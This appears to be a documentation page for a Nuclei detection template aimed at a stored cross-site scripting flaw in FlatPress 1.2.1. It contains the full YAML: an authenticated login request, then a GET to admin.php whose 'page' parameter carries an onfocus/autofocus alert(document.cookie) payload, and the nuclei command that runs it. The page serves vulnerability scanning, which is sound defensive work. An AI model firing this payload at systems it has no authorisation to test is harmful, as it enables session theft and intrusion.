Skip to content
Nuclei Templates

FlatPress 1.2.1 - Stored Cross-Site Scripting

ID: flatpress-xss

Severity: medium

Author: arafatansari

Tags: flatpress,xss,authenticated,oss,intrusive

Description

Section titled “Description”

FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can steal cookie-based authentication credentials and launch other attacks. Note: this is similar to CVE-2021-41432, however this attack uses the “page” parameter.

YAML Source

Section titled “YAML Source”
id: flatpress-xss


info:
  name: FlatPress 1.2.1 - Stored Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can steal cookie-based authentication credentials and launch other attacks. Note: this is similar to CVE-2021-41432, however this attack uses the "page" parameter.
  reference:
    - https://github.com/flatpressblog/flatpress/issues/153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Flatpress"
    product: flatpress
    vendor: flatpress
  tags: flatpress,xss,authenticated,oss,intrusive


http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp


        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="user"


        {{username}}
        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="pass"


        {{password}}
        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="submit"


        Login
        ------WebKitFormBoundarykGJmx9vKsePrMkVp--
      - |
        GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.cookie%29%22autofocus%3d%22 HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'value=""onfocus="alert(document.cookie)"autofocus=""'
          - 'FlatPress'
        condition: and


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a00473045022042c8e00d52bda3d675504914eb5a0c38bf59cd56dfcff856941a2c9409d1be13022100da1aafde6820b521566b01272decd65e9d02360cdeea4666132c0cd4930aa0b5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/flatpress-xss.yaml"

View on Github